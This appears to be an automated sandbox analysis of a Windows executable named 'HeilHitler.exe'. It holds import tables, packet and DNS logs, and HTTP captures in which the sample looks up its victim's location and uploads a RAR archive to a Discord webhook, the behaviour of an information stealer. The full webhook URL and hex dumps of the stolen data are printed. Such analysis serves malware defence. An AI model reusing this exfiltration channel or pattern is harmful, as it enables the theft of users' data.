KERNEL32.dll | GetACP, IsValidCodePage, GetStringTypeW, GetFileAttributesExW, SetEnvironmentVariableW, FlushFileBuffers, GetCurrentDirectoryW, LCMapStringW, CompareStringW, FlsFree, GetOEMCP, GetCPInfo, GetModuleHandleW, MulDiv, FormatMessageW, GetLastError, GetModuleFileNameW, LoadLibraryExW, SetDllDirectoryW, CreateSymbolicLinkW, GetProcAddress, GetEnvironmentStringsW, GetCommandLineW, GetEnvironmentVariableW, ExpandEnvironmentStringsW, DeleteFileW, FindClose, FindFirstFileW, FindNextFileW, GetDriveTypeW, RemoveDirectoryW, GetTempPathW, CloseHandle, QueryPerformanceCounter, QueryPerformanceFrequency, WaitForSingleObject, Sleep, GetCurrentProcess, TerminateProcess, GetExitCodeProcess, CreateProcessW, GetStartupInfoW, FreeLibrary, LocalFree, SetConsoleCtrlHandler, K32EnumProcessModules, K32GetModuleFileNameExW, CreateFileW, FindFirstFileExW, GetFinalPathNameByHandleW, MultiByteToWideChar, WideCharToMultiByte, FlsSetValue, FreeEnvironmentStringsW, GetProcessHeap, GetTimeZoneInformation, HeapSize, HeapReAlloc, WriteConsoleW, SetEndOfFile, CreateDirectoryW, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsProcessorFeaturePresent, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, RtlUnwindEx, SetLastError, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, RaiseException, RtlPcToFileHeader, GetCommandLineA, GetFileInformationByHandle, GetFileType, PeekNamedPipe, SystemTimeToTzSpecificLocalTime, FileTimeToSystemTime, ReadFile, GetFullPathNameW, SetStdHandle, GetStdHandle, WriteFile, ExitProcess, GetModuleHandleExW, HeapFree, GetConsoleMode, ReadConsoleW, SetFilePointerEx, GetConsoleOutputCP, GetFileSizeEx, HeapAlloc, FlsAlloc, FlsGetValue
ADVAPI32.dll | OpenProcessToken, GetTokenInformation, ConvertStringSecurityDescriptorToSecurityDescriptorW, ConvertSidToStringSidW
GDI32.dll | SelectObject, DeleteObject, CreateFontIndirectW
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                                                                                                                          Nov 15, 2024 10:44:35.541385889 CET44350937162.159.128.233192.168.2.4
                                                                                                                                                                                                                                          Nov 15, 2024 10:44:35.541522980 CET50937443192.168.2.4162.159.128.233
                                                                                                                                                                                                                                          Nov 15, 2024 10:44:35.541539907 CET44350937162.159.128.233192.168.2.4
                                                                                                                                                                                                                                          Nov 15, 2024 10:44:35.541559935 CET50937443192.168.2.4162.159.128.233
                                                                                                                                                                                                                                          Nov 15, 2024 10:44:35.541567087 CET44350937162.159.128.233192.168.2.4
                                                                                                                                                                                                                                          Nov 15, 2024 10:44:35.541599989 CET50937443192.168.2.4162.159.128.233
                                                                                                                                                                                                                                          Nov 15, 2024 10:44:35.541610003 CET44350937162.159.128.233192.168.2.4
                                                                                                                                                                                                                                          Nov 15, 2024 10:44:35.541651011 CET50937443192.168.2.4162.159.128.233
                                                                                                                                                                                                                                          Nov 15, 2024 10:44:35.541660070 CET44350937162.159.128.233192.168.2.4
                                                                                                                                                                                                                                          Nov 15, 2024 10:44:35.541677952 CET50937443192.168.2.4162.159.128.233
                                                                                                                                                                                                                                          Nov 15, 2024 10:44:35.541747093 CET50937443192.168.2.4162.159.128.233
                                                                                                                                                                                                                                          Nov 15, 2024 10:44:35.541781902 CET50937443192.168.2.4162.159.128.233
                                                                                                                                                                                                                                          Nov 15, 2024 10:44:35.541798115 CET50937443192.168.2.4162.159.128.233
                                                                                                                                                                                                                                          Nov 15, 2024 10:44:35.541847944 CET50937443192.168.2.4162.159.128.233
                                                                                                                                                                                                                                          Nov 15, 2024 10:44:35.541879892 CET50937443192.168.2.4162.159.128.233
                                                                                                                                                                                                                                          Nov 15, 2024 10:44:35.541929960 CET50937443192.168.2.4162.159.128.233
                                                                                                                                                                                                                                          Nov 15, 2024 10:44:35.541979074 CET50937443192.168.2.4162.159.128.233
                                                                                                                                                                                                                                          Nov 15, 2024 10:44:35.542021036 CET50937443192.168.2.4162.159.128.233
                                                                                                                                                                                                                                          Nov 15, 2024 10:44:35.546875000 CET44350937162.159.128.233192.168.2.4
                                                                                                                                                                                                                                          Nov 15, 2024 10:44:35.547097921 CET50937443192.168.2.4162.159.128.233
                                                                                                                                                                                                                                          Nov 15, 2024 10:44:35.547131062 CET44350937162.159.128.233192.168.2.4
                                                                                                                                                                                                                                          Nov 15, 2024 10:44:35.547161102 CET50937443192.168.2.4162.159.128.233
                                                                                                                                                                                                                                          Nov 15, 2024 10:44:35.547213078 CET44350937162.159.128.233192.168.2.4
                                                                                                                                                                                                                                          Nov 15, 2024 10:44:35.547220945 CET50937443192.168.2.4162.159.128.233
                                                                                                                                                                                                                                          Nov 15, 2024 10:44:35.547250032 CET44350937162.159.128.233192.168.2.4
                                                                                                                                                                                                                                          Nov 15, 2024 10:44:36.359620094 CET44350937162.159.128.233192.168.2.4
                                                                                                                                                                                                                                          Nov 15, 2024 10:44:36.359688044 CET44350937162.159.128.233192.168.2.4
                                                                                                                                                                                                                                          Nov 15, 2024 10:44:36.359858036 CET50937443192.168.2.4162.159.128.233
                                                                                                                                                                                                                                          Nov 15, 2024 10:44:36.360840082 CET50937443192.168.2.4162.159.128.233
                                                                                                                                                                                                                                          Nov 15, 2024 10:44:36.379101992 CET5093680192.168.2.4208.95.112.1
                                                                                                                                                                                                                                          Nov 15, 2024 10:44:36.384427071 CET8050936208.95.112.1192.168.2.4
                                                                                                                                                                                                                                          Nov 15, 2024 10:44:36.384526968 CET5093680192.168.2.4208.95.112.1
Timestamp                            Source Port  Dest Port  Source IP    Dest IP
Nov 15, 2024 10:44:23.530311108 CET  53           59993      1.1.1.1      192.168.2.4
Nov 15, 2024 10:44:33.844727993 CET  64228        53         192.168.2.4  1.1.1.1
Nov 15, 2024 10:44:33.851701021 CET  53           64228      1.1.1.1      192.168.2.4
Nov 15, 2024 10:44:34.877973080 CET  58411        53         192.168.2.4  1.1.1.1
Nov 15, 2024 10:44:34.884932041 CET  53           58411      1.1.1.1      192.168.2.4
Timestamp                            Source IP    Dest IP  Trans ID  OP Code             Name         Type            Class        DNS over HTTPS
Nov 15, 2024 10:44:33.844727993 CET  192.168.2.4  1.1.1.1  0xac15    Standard query (0)  ip-api.com   A (IP address)  IN (0x0001)  false
Nov 15, 2024 10:44:34.877973080 CET  192.168.2.4  1.1.1.1  0xaea     Standard query (0)  discord.com  A (IP address)  IN (0x0001)  false
Timestamp                            Source IP  Dest IP      Trans ID  Reply Code    Name                         CName  Address          Type            Class        DNS over HTTPS
Nov 15, 2024 10:44:19.434757948 CET  1.1.1.1    192.168.2.4  0x8895    No error (0)  bg.microsoft.map.fastly.net         199.232.214.172  A (IP address)  IN (0x0001)  false
Nov 15, 2024 10:44:19.434757948 CET  1.1.1.1    192.168.2.4  0x8895    No error (0)  bg.microsoft.map.fastly.net         199.232.210.172  A (IP address)  IN (0x0001)  false
Nov 15, 2024 10:44:33.851701021 CET  1.1.1.1    192.168.2.4  0xac15    No error (0)  ip-api.com                          208.95.112.1     A (IP address)  IN (0x0001)  false
Nov 15, 2024 10:44:34.884932041 CET  1.1.1.1    192.168.2.4  0xaea     No error (0)  discord.com                         162.159.128.233  A (IP address)  IN (0x0001)  false
Nov 15, 2024 10:44:34.884932041 CET  1.1.1.1    192.168.2.4  0xaea     No error (0)  discord.com                         162.159.137.232  A (IP address)  IN (0x0001)  false
Nov 15, 2024 10:44:34.884932041 CET  1.1.1.1    192.168.2.4  0xaea     No error (0)  discord.com                         162.159.136.232  A (IP address)  IN (0x0001)  false
Nov 15, 2024 10:44:34.884932041 CET  1.1.1.1    192.168.2.4  0xaea     No error (0)  discord.com                         162.159.135.232  A (IP address)  IN (0x0001)  false
Nov 15, 2024 10:44:34.884932041 CET  1.1.1.1    192.168.2.4  0xaea     No error (0)  discord.com                         162.159.138.232  A (IP address)  IN (0x0001)  false
• discord.com
• ip-api.com
Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
0           192.168.2.4  50936        208.95.112.1    80                7448  C:\Users\user\Desktop\HeilHitler.exe

Timestamp                            Bytes transferred  Direction  Data
Nov 15, 2024 10:44:33.857727051 CET  116                OUT        GET /json/?fields=225545 HTTP/1.1
                                                                   Host: ip-api.com
                                                                   Accept-Encoding: identity
                                                                   User-Agent: python-urllib3/2.2.2
Nov 15, 2024 10:44:34.504224062 CET  375                IN         HTTP/1.1 200 OK
                                                                   Date: Fri, 15 Nov 2024 09:44:33 GMT
                                                                   Content-Type: application/json; charset=utf-8
                                                                   Content-Length: 198
                                                                   Access-Control-Allow-Origin: *
                                                                   X-Ttl: 60
                                                                   X-Rl: 44
                                                                   Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 54 65 78 61 73 22 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 22 2c 22 72 65 76 65 72 73 65 22 3a 22 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 39 2e 73 74 61 74 69 63 2e 71 75 61 64 72 61 6e 65 74 2e 63 6f 6d 22 2c 22 6d 6f 62 69 6c 65 22 3a 66 61 6c 73 65 2c 22 70 72 6f 78 79 22 3a 66 61 6c 73 65 2c 22 71 75 65 72 79 22 3a 22 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 39 22 7d
                                                                   Data Ascii: {"status":"success","country":"United States","regionName":"Texas","timezone":"America/Chicago","reverse":"173.254.250.89.static.quadranet.com","mobile":false,"proxy":false,"query":"173.254.250.89"}


Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
0           192.168.2.4  50937        162.159.128.233  443               7448  C:\Users\user\Desktop\HeilHitler.exe

Timestamp                Bytes transferred  Direction  Data
2024-11-15 09:44:35 UTC  302                OUT        POST /api/webhooks/1302413781162266715/WJ0cdpWb68IO94MZWMtc7o2HkgZFWYLoExtrMC3fyimxUgR5SCyIRovGkrea9pNRE2_V HTTP/1.1
                                                       Host: discord.com
                                                       Accept-Encoding: identity
                                                       Content-Length: 759927
                                                       User-Agent: python-urllib3/2.2.2
                                                       Content-Type: multipart/form-data; boundary=8a9179acbaa5554a9b480b1ba637caac
2024-11-15 09:44:35 UTC  16384              OUT        Data Raw: 2d 2d 38 61 39 31 37 39 61 63 62 61 61 35 35 35 34 61 39 62 34 38 30 62 31 62 61 36 33 37 63 61 61 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 42 6c 61 6e 6b 2d 6a 6f 6e 65 73 2e 72 61 72 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 52 61 72 21 1a 07 01 00 0f fd 42 e2 21 04 00 00 01 0f 9c 01 e5 f8 bf 2f a7 d8 34 33 60 7e 7f 72 f0 91 3e b9 c8 56 54 a4 fd 49 2b 85 ac 13 06 e5 ac 0b fd 72 b3 87 c8 7f 33 4a fe 85 f3 81 ee 26 81 b3 65 80 cf cf 88 03 37 31 1c 24 27 34 4e 59 76 79 ac 00 e6 60 6c 36 63 c5 fe 9e a0 2a 28 ff fd 19 10 ba bb de 2e 5c
                                                       Data Ascii: --8a9179acbaa5554a9b480b1ba637caacContent-Disposition: form-data; name="file"; filename="Blank-user.rar"Content-Type: application/octet-streamRar!B!/43`~r>VTI+r3J&e71$'4NYvy`l6c*(.\
2024-11-15 09:44:35 UTC  16384              OUT        Data Raw: 2d c8 20 f3 a7 92 06 4e 93 aa cc 88 56 26 df 64 e7 9e 29 83 a9 f8 9a e1 aa 3b ec 25 9b 17 69 13 52 a7 ca 5c e3 9a f1 92 a8 c6 dd 95 d0 e5 36 b6 06 bf 19 ad 12 09 4b d1 fe 37 f4 2d 1a c0 32 b9 74 de 04 9b 06 53 3f 8e 6e 0a fa d2 9e a1 27 d5 04 5e 0c 0f ba 74 85 ea fc 0b 37 7c 63 80 42 77 e0 34 8c a9 34 df 1d 92 c3 8e e0 85 0a b4 df a1 be fe 08 76 3d 37 87 17 31 f3 2e 8b 34 c6 90 5d c2 c3 76 e6 43 1d 15 f6 68 09 ec d8 36 5b 1a cb c3 38 e6 1b 87 0b a2 56 d3 a9 3f 3c d6 c2 41 92 b4 52 c5 a4 9c 6e 3e 41 65 a5 b4 df 0f 15 62 03 aa 59 6d ee 0c aa 5d f6 35 d5 d2 95 32 ca 8b c7 02 08 4f 62 f1 0a d1 ba 5f d6 96 58 4e 6e 41 fb 11 80 00 bf 99 8e b4 e9 cf 31 40 ee 32 78 06 e9 3a 26 aa 9d 37 f5 56 12 84 e4 bb d0 7c 87 2d 1b 6e 74 0d 95 99 6a b8 f7 df 4f 6a a5 2f 6a 8b
                                                       Data Ascii: - NV&d);%iR\6K7-2tS?n'^t7|cBw44v=71.4]vCh6[8V?<ARn>AebYm]52Ob_XNnA1@2x:&7V|-ntjOj/j
2024-11-15 09:44:35 UTC  16384              OUT        Data Raw: 14 9a fc cf af 07 83 bd 3c 93 20 e7 fa 57 a1 53 5e ad ef 19 63 ac 0f da 50 c4 15 78 24 63 19 8a 2b 61 92 f8 9d 83 9d ee 5e 63 5d 68 42 bc f1 bf 91 3e 0c 19 47 bb 4c b8 2d 96 ba 06 d2 34 a6 c8 14 d7 a4 a6 97 bb 0a d0 75 5e bb 76 8c 0a ea fd 8c 65 6f c8 b1 1e 46 4b a3 ab b4 37 f1 25 cb c9 58 7e 33 89 03 42 4b ed 56 7c 4d 50 08 1f ae b3 68 48 2c 36 28 96 d5 55 c9 96 fc 60 0a c9 5a 84 0b 6e 63 82 37 b1 1e 81 89 4a 90 17 2c f8 8f 9b 89 51 2c d4 87 7f d7 54 08 5f 53 e8 2d 29 cb 00 fe 4b bc 96 7e dc 37 f4 2e 80 17 f8 8f 98 4c 39 6e d7 48 4a 81 34 d1 04 ba f1 57 59 f9 5e 6c 3b 32 27 b1 2a e3 43 eb 07 38 0a 12 12 8c 4c 57 5a fb c9 47 da 63 4b 3c 07 1f 8f 94 81 26 c1 9e 6c 72 69 b2 4b b5 4f 9d c0 e6 a3 b9 62 17 05 7a 27 28 dc 0b d6 ea e8 56 f4 83 31 f0 77 ba 32 dc
                                                       Data Ascii: < WS^cPx$c+a^c]hB>GL-4u^veoFK7%X~3BKV|MPhH,6(U`Znc7J,Q,T_S-)K~7.L9nHJ4WY^l;2'*C8LWZGcK<&lriKObz'(V1w2
2024-11-15 09:44:35 UTC  16384              OUT        Data Raw: d1 1a c3 ef 91 2d dd ec 3a 07 8a 7b a9 71 83 a1 f2 ea 7c db 02 ae c8 d8 28 c1 d2 10 0a 80 c1 34 cb d1 2a 83 9b 7c e2 24 96 cf 62 06 0f 32 6b 59 e1 75 b3 dd 9c 95 c5 b7 9f 4a 5d d4 d1 63 ba 99 9b 4f 5c 05 10 6b 50 c0 7f bf 51 7b 9e 7e 42 dc 15 0a 53 f5 38 a2 f8 23 42 fa be 6c c7 64 35 8f f6 b9 8a ed b0 e8 73 1d d7 e6 19 94 8c 82 1a ed ee 48 64 ba 4f 3b f1 79 1e 11 5f 4c 1e b4 6d 1e 79 bd 3e fa 7f 74 f4 df b9 b3 db ef 66 8c 56 76 01 ad ee 9a 9d 30 fb f1 8a 9d b9 68 65 76 9b c3 58 9b 1e f2 c6 d2 53 59 11 49 af 94 2b 3b bb 02 7b ba 6f a5 89 34 94 e5 2d 9c d7 e7 79 07 53 69 ce f9 a7 a0 25 32 15 d9 84 e6 8d 27 fb b2 46 a3 d1 7b 77 73 a8 d4 90 b6 54 fa 5f 2e 19 69 d1 48 fc 1b 67 0b f4 57 06 ad 60 c9 51 0c 1f 95 6b 3c 9d 19 b4 80 c3 ed 5f 8d 38 42 61 8f a2 d0 f3
                                                       Data Ascii: -:{q|(4*|$b2kYuJ]cO\kPQ{~BS8#Bld5sHdO;y_Lmy>tfVv0hevXSYI+;{o4-ySi%2'F{wsT_.iHgW`Qk<_8Ba
2024-11-15 09:44:35 UTC  16384              OUT        Data Raw: 42 94 f8 6f d1 e5 8c 5e dc e5 ec d6 1d be 10 38 e2 cb 52 f3 7f 2d 43 e4 88 b3 78 b2 61 7a d4 51 c9 30 9e cb 96 bc db 39 5c 8d 72 83 d2 45 b1 e5 3e 36 c4 0c 90 54 3a 96 26 7f 70 e0 2c e3 1c 7b 67 a9 1d 28 e7 db 32 6d 08 f8 b6 9f 48 17 c3 6b 9e 54 c6 c2 1e c7 5e 8b 73 77 ad eb c2 58 27 a8 b1 55 66 60 2b ac c3 d9 45 39 a3 bd 60 1d ec 2d eb e3 53 8d 28 62 f0 81 20 3d 66 ac ca 32 ef 9c 50 16 bf 74 a1 44 06 20 17 cb ec 79 18 85 c0 19 9f 24 5d 6e fb 7c 90 61 24 f1 ee 39 fc 53 77 3b 80 d3 33 5d 1e af 7c 66 fd 47 09 1b 76 68 23 f3 22 26 6f 77 6d 5a 9b ea 32 76 7c d2 1c d4 96 de 14 01 0e 93 80 e0 c4 aa fd 33 ab d3 96 33 be 66 2c 9c b4 d5 ed ba a7 81 d2 69 2a 41 79 fa 68 78 47 3a 90 3e bc eb 19 60 64 b7 a8 ae 9d 34 93 88 cd 6c 71 d0 f0 05 13 df 57 f0 6b 49 16 f3 9a
                                                       Data Ascii: Bo^8R-CxazQ09\rE>6T:&p,{g(2mHkT^swX'Uf`+E9`-S(b =f2PtD y$]n|a$9Sw;3]|fGvh#"&owmZ2v|33f,i*AyhxG:>`d4lqWkI
2024-11-15 09:44:35 UTC  16384              OUT        Data Raw: 26 b1 9c fc 63 09 52 08 c2 d4 7b ae 42 81 33 90 67 18 1e e2 8a 8c b9 d6 a0 db 7b 62 b8 03 a7 68 d8 fd 25 97 d8 13 c8 e1 41 cd 13 4d 7d 5b ca e9 06 e4 d4 e2 46 b3 6d 2e 14 a7 ea c8 a6 06 4e df ee 0a 03 37 83 b6 86 2f 8e 35 3c 12 03 8a be e1 a1 31 fc dc 65 95 ec ad f9 b3 0d 19 2e 23 9f 00 b0 be 1d a2 d3 00 68 a0 25 a9 b2 4f 4f 4c f7 9c ed be fc f0 3b aa a4 ac d8 ff eb af 3e a5 c3 d4 f8 6a 37 ae f8 ab 73 15 88 13 f3 19 29 58 10 22 40 6e e4 67 aa e7 83 0f 4b 82 16 c6 ea ed 99 5e 8f 84 6b b9 53 df 9c cd e6 fc b0 be 8b fb ce c4 27 32 89 60 b9 c1 98 bb 7f 78 cb ed 4a be 10 1e 37 bb 9c b0 cb 3d 77 78 a2 16 dd 64 e4 39 fe 41 61 5f 5b 06 76 14 2a f3 ee 5b 2d 55 1b 35 05 0b ab c1 98 9f 50 51 64 01 8e 71 4e e7 b2 b8 04 18 d6 46 f9 da 99 d6 a0 7c f4 35 7b d9 eb 04 df
                                                       Data Ascii: &cR{B3g{bh%AM}[Fm.N7/5<1e.#h%OOL;>j7s)X"@ngK^kS'2`xJ7=wxd9Aa_[v*[-U5PQdqNF|5{
2024-11-15 09:44:35 UTC  16384              OUT        Data Raw: 4e 34 d6 48 a8 04 64 84 a4 d6 ee a6 0e ff 28 08 3a 22 80 0a 80 75 02 8f 1a ff eb 8a 3c 36 cd 92 72 65 30 3a 70 26 69 c0 81 f3 8d b4 16 86 5f cf de ec 13 bc 8f 62 30 f7 f5 5f 78 1b 09 09 20 11 94 18 1e 53 54 8d 3c 1a d4 7d 1c 99 9e 69 b5 4b db ff a8 d9 dc 1a 85 44 bd 8e 81 1b ac 62 0a e9 05 13 52 57 30 2f 9b e2 72 f1 7a 64 41 75 ed b7 2b c0 f7 07 e5 f4 5b 7f 35 6f 55 e7 47 91 32 56 ae 95 63 8a f6 62 0d 87 12 7c c3 cd 74 39 56 60 29 89 66 f4 d5 58 c4 96 99 22 2a d7 b7 0d 59 4c ac 91 f0 45 fa f7 31 f4 07 11 d0 46 2d e0 5e 07 ce fa 98 9c d6 ab da 55 b4 0c 4b 89 be 10 dc 67 7b 23 e6 e1 22 b7 a4 c8 c2 8b ef d4 39 8b a6 2f 28 da dd 1e 47 90 85 97 dd 0b 74 ef d8 4d 7f 86 e1 d3 ed c4 60 09 2c 8b 56 3c 61 b1 d1 a1 d9 f2 4f 33 92 5a 8b 0f 2d 03 e2 56 5e 64 8e d4 62
                                                                                                                                                                                                                                          2024-11-15 09:44:35 UTC16384OUTData Raw: 4e 34 d6 48 a8 04 64 84 a4 d6 ee a6 0e ff 28 08 3a 22 80 0a 80 75 02 8f 1a ff eb 8a 3c 36 cd 92 72 65 30 3a 70 26 69 c0 81 f3 8d b4 16 86 5f cf de ec 13 bc 8f 62 30 f7 f5 5f 78 1b 09 09 20 11 94 18 1e 53 54 8d 3c 1a d4 7d 1c 99 9e 69 b5 4b db ff a8 d9 dc 1a 85 44 bd 8e 81 1b ac 62 0a e9 05 13 52 57 30 2f 9b e2 72 f1 7a 64 41 75 ed b7 2b c0 f7 07 e5 f4 5b 7f 35 6f 55 e7 47 91 32 56 ae 95 63 8a f6 62 0d 87 12 7c c3 cd 74 39 56 60 29 89 66 f4 d5 58 c4 96 99 22 2a d7 b7 0d 59 4c ac 91 f0 45 fa f7 31 f4 07 11 d0 46 2d e0 5e 07 ce fa 98 9c d6 ab da 55 b4 0c 4b 89 be 10 dc 67 7b 23 e6 e1 22 b7 a4 c8 c2 8b ef d4 39 8b a6 2f 28 da dd 1e 47 90 85 97 dd 0b 74 ef d8 4d 7f 86 e1 d3 ed c4 60 09 2c 8b 56 3c 61 b1 d1 a1 d9 f2 4f 33 92 5a 8b 0f 2d 03 e2 56 5e 64 8e d4 62
                                                                                                                                                                                                                                          Data Ascii: N4Hd(:"u<6re0:p&i_b0_x ST<}iKDbRW0/rzdAu+[5oUG2Vcb|t9V`)fX"*YLE1F-^UKg{#"9/(GtM`,V<aO3Z-V^db
                                                                                                                                                                                                                                          2024-11-15 09:44:35 UTC16384OUTData Raw: 43 af b1 f1 81 39 9a a3 73 05 0d 0f 01 30 ee 3d f8 7a 70 e7 65 fa f7 4c 60 d5 11 35 60 e8 b5 07 cc d9 35 fe 17 a0 09 a9 b0 59 3e 71 8e a9 bc 0d c5 b4 6b 27 8c 4b c4 ae aa bc 7f af ba a5 a4 9e d9 e7 1e 10 09 af 4c 29 c7 d3 89 6a 76 11 de d5 aa df bd bc 57 44 53 1e 1d 33 a2 e8 b3 71 ce 70 9c 5d f6 3d 8c a8 44 76 9f 29 9e b2 c6 54 b3 12 1a c6 0d a1 27 57 d7 57 5f 02 19 82 4b 23 d6 98 33 90 0f 5a d0 2d ad 2d 8a 02 b8 ea f3 65 fa 58 e9 dd 2e 6b 78 9d cf 46 2b 8f 9f c7 c9 23 c8 e0 19 94 27 9c 77 21 0e 25 84 9d a5 ec e4 20 f3 25 3f 61 4f b3 5d e9 2b d6 51 cc e6 d9 30 b6 2b 06 00 f0 7a b9 ca 36 25 a4 b2 b5 0a e8 e3 a6 5a b5 fc 60 e2 89 58 7c 96 29 19 29 8e 04 95 60 75 06 58 7e f8 57 40 9e 37 b2 9e dd 92 f2 a4 d6 b7 f6 3b 42 89 29 71 29 39 04 4f db 63 85 38 e7 2a
                                                                                                                                                                                                                                          Data Ascii: C9s0=zpeL`5`5Y>qk'KL)jvWDS3qp]=Dv)T'WW_K#3Z--eX.kxF+#'w!% %?aO]+Q0+z6%Z`X|))`uX~W@7;B)q)9Oc8*
                                                                                                                                                                                                                                          2024-11-15 09:44:35 UTC16384OUTData Raw: ac 3e e8 89 e0 95 c5 a2 b7 9a 86 bf 2a 30 27 ab e4 a3 2a e0 53 46 fb 00 c5 03 2f ea c4 97 6b 78 44 24 55 5a e6 20 55 60 f7 bd f7 99 c9 03 03 82 2e a5 d5 34 c5 7f 17 d3 c0 ec 26 fb 77 f9 fc 62 67 57 0e 1a 3e 82 d8 e4 3d 4e b4 82 8d af 92 30 b3 3c 2e ea 8e c3 2d 1d cf d5 60 c1 5b f2 b0 81 f7 a6 4a 6a ac 4a 76 95 1c b2 9f 8d 84 38 b9 b9 11 fc 5b ee ca df 25 e3 4d c1 c4 ed cb 39 a7 57 8e 56 c5 5b f8 de 41 c0 ae 30 c0 43 96 80 b8 49 9f d1 81 4c e3 80 50 c9 5f cb c4 e5 73 ae 6b 6c d8 9c 71 97 41 2d dc 87 e8 53 1d 35 e6 d7 ea fa 94 65 ca 12 dd da 04 db c5 07 1e 95 30 59 0d 75 34 ff f0 11 78 40 2a 6d 50 ee fd fd ef d9 88 1f f2 78 ea 30 3b f4 c8 05 43 db 1e 23 80 1a 32 70 ec 17 50 dd ff ff 83 0a 13 0d 4c 25 c1 e1 5c 03 d6 b5 74 24 ec b5 67 28 f4 f2 8f 7c 7b 4e e5
                                                                                                                                                                                                                                          Data Ascii: >*0'*SF/kxD$UZ U`.4&wbgW>=N0<.-`[JjJv8[%M9WV[A0CILP_sklqA-S5e0Yu4x@*mPx0;C#2pPL%\t$g(|{N
                                                                                                                                                                                                                                          2024-11-15 09:44:35 UTC16384OUTData Raw: 47 55 45 ce 28 2b de 91 8e 20 e8 c4 bd ea 6a 03 c4 1e 1d 9f 4c 4f 81 8d 3b 0c e7 49 1c 61 0f cf 2f 3e 6e c1 69 b6 1f d6 85 42 fb 96 65 f5 83 d3 ae 16 95 63 89 91 66 fd dd af 03 4f 75 d8 22 03 f2 d3 a4 a0 50 8f 2a 01 4c 5e 7e 8c d9 e3 34 53 37 0d c1 d9 c4 81 0e 18 4a 71 e3 03 ec ed f9 b5 b7 77 e0 dd ea 58 54 ac 86 8e 67 9a 19 c5 c9 4a e9 83 d6 3e d0 75 81 4b 93 24 33 1c 01 5f 8f 77 37 7a 03 f2 2d d4 16 84 e0 10 11 a9 9e 58 b2 52 06 12 a2 a4 ad c7 50 8e b0 b4 17 ab 99 f1 2f 68 08 6f b0 c7 b4 45 63 e9 a1 8f 6b c8 1e 42 5c 45 67 83 e0 d8 04 85 a8 82 a7 77 36 80 b3 61 0f 5c 46 f1 2a c2 0e 26 db cf 95 e9 06 9a 80 e9 a7 68 1c 50 e3 ab 5e e3 cc e6 b6 d6 a4 ee 2f 6c 2c 9d 0d 23 01 c9 8d 53 1d 88 e7 69 4b 0f 16 99 4c eb 72 f6 8f a3 7a 25 12 e2 c0 ab 64 d2 75 32 11
                                                                                                                                                                                                                                          Data Ascii: GUE(+ jLO;Ia/>niBecfOu"P*L^~4S7JqwXTgJ>uK$3_w7z-XRP/hoEckB\Egw6a\F*&hP^/l,#SiKLrz%du2
                                                                                                                                                                                                                                          2024-11-15 09:44:36 UTC1259INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                          Date: Fri, 15 Nov 2024 09:44:36 GMT
                                                                                                                                                                                                                                          Content-Type: application/json
                                                                                                                                                                                                                                          Content-Length: 45
                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                          Cache-Control: public, max-age=3600, s-maxage=3600
                                                                                                                                                                                                                                          strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                          x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                                                                                                                                                                                          x-ratelimit-limit: 5
                                                                                                                                                                                                                                          x-ratelimit-remaining: 4
                                                                                                                                                                                                                                          x-ratelimit-reset: 1731663877
                                                                                                                                                                                                                                          x-ratelimit-reset-after: 1
                                                                                                                                                                                                                                          via: 1.1 google
                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sL1ESUKxhK9%2Babw4uCeDjxgqI4thUCNJCC78TML%2F85lNJMjNqLMWZ7Zs%2FqLOkjx%2BeMM11gsaMrJdKoNakvekrPA90Myi75LQhPIN6Y5BQQA7YVaXA%2FFvJrTzqQTB"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                          Set-Cookie: __cfruid=f55cd052b753aefed4ac19e3284c0198d78f1511-1731663876; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                                          Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                                                                                                                                                                                                          Set-Cookie: _cfuvid=g7xrMuiCuj5YxJWgwxHxx7_wo5yDsKgDIiJmgNGLoGA-1731663876289-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                          CF-RAY: 8e2e4db66acf6bce-DFW


                                                                                                                                                                                                                                          Target ID:0
                                                                                                                                                                                                                                          Start time:04:44:01
                                                                                                                                                                                                                                          Start date:15/11/2024
                                                                                                                                                                                                                                          Path:C:\Users\user\Desktop\HeilHitler.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
